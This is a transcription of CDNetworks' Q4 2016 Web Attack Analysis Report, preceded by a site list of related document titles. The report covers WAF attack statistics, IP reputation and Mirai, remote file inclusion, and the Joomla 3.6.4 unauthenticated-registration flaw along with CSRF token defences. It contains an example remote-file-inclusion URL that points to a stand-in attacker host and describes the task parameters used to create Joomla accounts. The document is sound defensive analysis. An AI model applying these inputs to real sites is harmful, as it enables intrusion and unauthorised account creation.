Q Web Attack Analysis Report

Similar documents
2015 DDoS Attack Trends and 2016 Outlook

XOR.DDoS Attack Analysis Report

+ + Increased website traffic by 40% + + Reduced datacenter costs + + Improved scalability + + Better user experience, higher customer

CDNetworks DDoS Attack Trends and Outlook for February 2015 CDNetworks Security Service Team. Copyright 2015 CDNetworks

Opportunities, Challenges, and the Right Solution

WHITE PAPER. DNS: Key Considerations Before Deploying Your Solution

Improve internet performance and reliability, resulting in faster application response times

Cloud DNS. High Performance under any traffic conditions from anywhere in the world. Reliable. Performance

Imperva Incapsula Website Security

86% of websites has at least 1 vulnerability and an average of 56 per website WhiteHat Security Statistics Report 2013

Web Application Penetration Testing

Kenna Platform Security. A technical overview of the comprehensive security measures Kenna uses to protect your data

Attacks Against Websites. Tom Chothia Computer Security, Lecture 11

F5 comprehensive protection against application attacks. Jakub Sumpich Territory Manager Eastern Europe

Solutions Business Manager Web Application Security Assessment

SOLUTION BRIEF. Enabling and Securing Digital Business in API Economy. Protect APIs Serving Business Critical Applications

Web Applications Penetration Testing

Cyber Security & Ethical Hacking Training. Introduction to Cyber Security Introduction to Cyber Security. Linux Operating System and Networking: LINUX

Securing Cloud Applications with a Distributed Web Application Firewall Riverbed Technology

Your Turn to Hack the OWASP Top 10!

IBM SmartCloud Notes Security

DreamFactory Security Guide

Cloud DNS Phone: (877)

haltdos - Web Application Firewall

Web. WebAP. WebAP. WebAP 2.1 [7][8] OWASP *2 [1] OWASP. Skrupsky

INF3700 Informasjonsteknologi og samfunn. Application Security. Audun Jøsang University of Oslo Spring 2015

Herding Cats. Carl Brothers, F5 Field Systems Engineer

epldt Web Builder Security March 2017

Sucuri Technical Overview

Web Application Security. Philippe Bogaerts

HP 2012 Cyber Security Risk Report Overview

Application Security Approach

Comprehensive DDoS Attack Protection: Cloud-based, Enterprise Grade Mitigation F5 Silverline

PRESENTED BY:

Imperva Incapsula Product Overview

RiskSense Attack Surface Validation for Web Applications

THE KERNEL. Our in-house professional team is highly skilled in delivering cutting-edge solutions to our clients.

P2_L12 Web Security Page 1

01/02/2014 SECURITY ASSESSMENT METHODOLOGIES SENSEPOST 2014 ALL RIGHTS RESERVED

BEST PRACTICES FOR SELECTING A WEB APPLICATION SCANNING (WAS) SOLUTION

Integrated Web Application Firewall (WAF) & Distributed Denial Of Service (DDoS) Mitigation For Today s Enterprises

EPRI Software Development 2016 Guide for Testing Your Software. Software Quality Assurance (SQA)

Hacker Academy Ltd COURSES CATALOGUE. Hacker Academy Ltd. LONDON UK

VULNERABILITIES IN 2017 CODE ANALYSIS WEB APPLICATION AUTOMATED

Application security : going quicker

Andrew Muller, Canberra Managing Director, Ionize, Canberra The challenges of Security Testing. Security Testing. Taming the Wild West

Application Security Introduction. Tara Gu IBM Product Security Incident Response Team

Penetration Testing with Kali Linux

Kishin Fatnani. Founder & Director K-Secure. Workshop : Application Security: Latest Trends by Cert-In, 30 th Jan, 2009

The Presence and Future of Web Attacks

Certified Secure Web Application Engineer

OWASP Top David Caissy OWASP Los Angeles Chapter July 2017

The Top 6 WAF Essentials to Achieve Application Security Efficacy

Contents. Background. Use Cases. Product Introduction. Product Value

(System) Integrity attacks System Abuse, Malicious File upload, SQL Injection

Web Application Firewall

1 About Web Security. What is application security? So what can happen? see [?]

Symlink attacks. Do not assume that symlinks are trustworthy: Example 1

Web Security. Thierry Sans

Common Websites Security Issues. Ziv Perry

Automatically Checking for Session Management Vulnerabilities in Web Applications

GUI based and very easy to use, no security expertise required. Reporting in both HTML and RTF formats - Click here to view the sample report.

Web Application Whitepaper

Application Security through a Hacker s Eyes James Walden Northern Kentucky University

Introduction Who needs WAF anyway? The Death of WAF? Advanced WAF Why F5?

En partenariat avec CA Technologies. Genève, Hôtel Warwick,

Attacks Against Websites 3 The OWASP Top 10. Tom Chothia Computer Security, Lecture 14

Cyber Attacks and Application - Motivation, Methods and Mitigation. Alfredo Vistola Solution Architect Security, EMEA

OWASP TOP 10. By: Ilia

Venusense UTM Introduction

Security Best Practices. For DNN Websites

Secure your Web Applications with AWS WAF & AWS Shield. James Chiang ( 蔣宗恩 ) AWS Solution Architect

Web Application Firewall Subscription on Cyberoam UTM appliances

WEB SECURITY: XSS & CSRF

COMP9321 Web Application Engineering

Perslink Security. Perslink Security. Eleonora Petridou Pascal Cuylaerts. System And Network Engineering University of Amsterdam.

Web Application Threats and Remediation. Terry Labach, IST Security Team

Advanced Ethical Hacking & Penetration Testing. Ethical Hacking

Penetration Testing following OWASP. Boyan Yanchev Chief Technology Ofcer Peter Dimkov IS Consultant

Enterprise Overview. Benefits and features of Cloudflare s Enterprise plan FLARE

Application vulnerabilities and defences

vol.15 August 1, 2017 JSOC Analysis Team

COMP9321 Web Application Engineering

COMP9321 Web Application Engineering

Curso: Ethical Hacking and Countermeasures

Security Architect Northeast US Enterprise CISSP, GCIA, GCFA Cisco Systems. BRKSEC-2052_c Cisco Systems, Inc. All rights reserved.

Copyright

Additional Security Services on AWS


TIBCO Cloud Integration Security Overview

Introduction to Ethical Hacking

Latest Threat: Statistics, Case Study and Solutions

Comodo cwatch Web Security Software Version 1.1

Integrated Web Application Firewall & Distributed Denial of Service (DDoS) Mitigation Solution

CSWAE Certified Secure Web Application Engineer

Integrity attacks (from data to code): Malicious File upload, code execution, SQL Injection

Mitigating Security Breaches in Retail Applications WHITE PAPER

Bypassing Web Application Firewalls

OWASP Broken Web Application Project. When Bad Web Apps are Good

Security in a Mainframe Emulator. Chaining Security Vulnerabilities Until Disaster Strikes (twice) Author Tim Thurlings & Meiyer Goren

Transcription:

Security Level Public CDNetworks Q4 2016 Web Attack Analysis Report 2017. 2. Security Service Team

Table of Contents Introduction... 3 Web Attack Analysis... 3 Part I. Web Hacking Statistics... 3 Part II. Web Hacking Cases... 5 Part III. Technical Analysis Data... 9 Conclusion... 13 Public 2 CopyrightcCDNetworks. All Rights Reserved.

Introduction CDNetworks provides a web hacking blocking service by applying Web Application Firewall (WAF) for web application security for customers. This report aims to help our customers operate web applications more safely by sharing the results of analysis of web hacking types identified through CDNetworks' WAF during the fourth quarter of 2016. Web Attack Analysis Part I. Web Hacking Statistics 1. Language-specific We found signs of attack on PHP (84%), JAVA (3%) and other languages (Python, etc., 13%), which are attributed primarily to the exposure of vulnerabilities of public CMS developed based on PHP (WordPress, Joomla, etc.) and attacks on them. 3% 13% 84% PHP JAVA ETC <Fig. 1> Web attacks by language 2. Vulnerability Type-specific SQL Injection, CSRF (Cross-site Request Forgery) and XSS (Cross-site scripting) account for most of the attack attempts. Public 3 CopyrightcCDNetworks. All Rights Reserved.

CSRF SQL Injection 26% 28% XSS 13% multiple vulnerabilities 10% authentication bypass Remote Code Execution 5% 6% Local file inclusion privilege escalation 3% 3% etc 6% <Fig. 2> Web attacks by vulnerability type Secure Coding OWASP Top 10 Type Share CWE-89 A1 SQL Injection 26% CWE-94 A1 Remote Code Execution 5% CWE-592 A2, A7 Authentication bypass 6% CWE-269 A2, A7 Privilege escalation 3% CWE-79 A3 XSS 13% CWE-98 A4 Local File Inclusion 3% CWE-352 A5 CSRF 28% Includes a Includes a comprehensive comprehensive Multiple vulnerabilities 10% listing of listing of CWE OWASP CWE-434, 23, 530 A4, A6 etc. 6% <Table 1> Vulnerability type Vulnerabilities under "Others" category include those related to file uploads/downloads and exposure of backup files. Public 4 CopyrightcCDNetworks. All Rights Reserved.

Part II. Web Hacking Cases 1. Web Scraping Web scraping is a technique for extracting data from websites by using an automation tool. The first figure shows that vulnerabilities of the website are identified through attacks without application of WAF. <Fig. 3> The vulnerability results using a web vulnerability analysis tool - 1 The second figure shows that WAF blocks most of the attack attempts. As for attack tool access, whether to allow or reject access is determined depending on the recognition of rate limit (access frequency), specific header (set-cookie) and page value (javascript). <Fig. 4> The vulnerability results using a web vulnerability analysis tool - 2 Public 5 CopyrightcCDNetworks. All Rights Reserved.

2. IP reputation IP reputation services block attacks by using a blacklist of IPs with attack history and use the following database information. <Fig. 5> IP reputation Any access attempt by an attacker with a blacklisted IP is blocked through client_ip field information identified through WAF. <Fig. 6> WAF detection information You can find the validation method for the relevant IP simply through googling. <Fig. 7> Results of googling IP validation method. Public 6 CopyrightcCDNetworks. All Rights Reserved.

Currently, there are a growing number of IPs used by Mirai, a botnet exploiting IoT, but attempts to use such IPs can be detected and blocked through this rule. http://data.netlab.360.com/mirai-scanner <Fig. 8> Mirai activity trend 3. Remote File Inclusion Remote file inclusion is a technique that includes malicious remote pages in the application to execute commands and acquire authority. As shown below, inclusion of malicious sites in the file parameter can be detected. (Example) http://vulnerable_host/vuln_page.php?file=http://attacker_site/malicous_page In the following case, the attempt to include a Russian domain in _dc parameter of picturefill.min.js was detected and blocked. Public 7 CopyrightcCDNetworks. All Rights Reserved.

<Fig. 9> WAF detection information The reliability validation method for the included domain was checked through a malicious file and URL analyzer site (Virustotal) and it was not determined to be an actual attack, as it was undetected through 68 anti-virus engines. <Fig. 10> Result of Virustotal lookup Public 8 CopyrightcCDNetworks. All Rights Reserved.

Part III. Technical Analysis Data Cross site request forgery (CSRF) is a malicious attack that forces an end user of a web application to execute actions of the attackers choosing by exploiting the site's vulnerabilities. CSRF takes place primarily when cookies (authentication information) used to identify individual users are not used properly according to purpose and authority so that the a ttacker can execute certain tasks or forge information by bypassing authority. For example, a procedure for posting a message on a certain message board is usually (1) accessing the board, (2) clicking "Write", (3) writing a message and (4) posting the message. But if posting a message is permitted without login, a large amount of spam can be posted in the board. This document will explore the process of analyzing vulnerabilities found in Joomla (homepage authoring CMS tool). Joomla 3.6.4 or previous versions have a vulnerability where an account is created or admin authority is randomly acquired. OWASP Top 10 OWASP Top 10 Result Remarks A8-Cross-Site-Request Forgery (CSRF) Vulnerable <Table 2> OWASP TOP 10-A8 Secure Coding CWE (Common Weakness Enumeration) Secure Coding (CWE) Result Remarks CWE-352: Cross-Site Request Forgery (CSRF) Vulnerable <Table 3> CWE-352 The above vulnerabilities take place primarily because a user can be added without authentication if register( ) in the source code (/com_users/controllers/user.php) is called. Public 9 CopyrightcCDNetworks. All Rights Reserved.

<Fig. 11> user.php vulnerability code The first attempt can add a user randomly by including registration.register in the parameter task value. <Fig. 12> user.php exploitation - 1 Public 10 CopyrightcCDNetworks. All Rights Reserved.

The second attempt can register an admin by including user.register in the parameter task value. <Fig. 13> user.php exploitation - 2 As shown below, a malicious user has been added. <Fig. 14> Addition of an unauthorized user Unlike the normal intended operation of an application, CSRF exploits abnormal paths. Attacks are not detected through blackbox (web scanner, etc.) or whitebox (source code diagnosis), but a consultant will discover vulnerabilities through a direct attack on the related module. Then how are such vulnerabilities removed? Secure Coding Guide, which was distributed in Korea, recommends changing the GET method to the POST method. Public 11 CopyrightcCDNetworks. All Rights Reserved.

Source: JAVA Secure Coding Guide for e-gov Software Developers <Fig. 15> Incorrect example regarding CSRF safe code But as POST method data forgery is possible through a proxy tool as well, the example is incorrect. Instead of the above method, it is better to transmit encrypted tokens to each critical page and validate the value from the server. The below example shows the secure coding method using the open csrffilter class. <Fig. 16> CSRF filter Public 12 CopyrightcCDNetworks. All Rights Reserved.

Through this, data forgery can be identified and blocked by re-validating the <secure-random> value delivered to the page on the server. <Fig. 17> CSRF exploitation and protection cases Conclusion We have explored various web attack types and the exploitation of Joomla applications for Q4 2016 and found that continuous attack attempts have been made against customers. As there are attempts to collect information through automated bots and security accidents related to DDoS attacks, such as GET flooding, it is essential to establish suitable security measures. CDNetworks' Cloud Security Service as a cloud-based web firewall is an effective solution for web security as it provides multi-tier protection to block DDoS, access by automated bots, and attacks on web vulnerabilities. Public 13 CopyrightcCDNetworks. All Rights Reserved.

About CDNetworks CDNetworks is a global content delivery network (CDN) with fully integrated Cloud Security DDoS protection and web application firewall. Our mission is to transform the Internet into a secure, reliable, scalable, and high-performing Application Delivery Network. CDNetworks accelerates more than 40,000 websites and cloud services over a network of 200 global PoPs in established and emerging markets including China and Russia. We have been serving enter prise customers for 16 years across industries such as gaming, finance, ecommerce, high tech, manufacturing, and media. CDNetworks offices are located in the U.S., UK, South Korea, China, Japan, and Singapore. For more information, please visit: https://www.cdnetworks.com.sg Copyright Statement Copyright CDNetworks. All Rights Reserved. Copyright in this document is owned by CDNetworks, and you may not reproduce or distribute this document without the prior permission of CDNetworks. Information in this document is subject to change without notice. Global Offices Singapore 51 Cuppage Road, #06-07, Singapore 229469 +65 6908 1198 US 1919 S. Bascom Avenue, Ste. 600, Campbell, CA 95008-2220 +1 408 228 3700 EMEA 85 Gresham Street, London EC2V 7NQ +44 203 657 2727 Korea 2F, 37, Teheran-ro 8-gil, Gangnam-Gu, Seoul (06239) +82 2 3441 0400 Japan Nittochi Nishi-shinjuku Building, 8th Floor, 6-10-1Nishishinjuku, Shinjuku-ku, Tokyo 160 0023 +81 3 5909 3369 China F15-05 Tower B, Greenland Center, Science and Technology Business Area, Wangjing, Chaoyang District, Beijing, 100102 +86 10 8441 7749 Public 14 CopyrightcCDNetworks. All Rights Reserved.

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback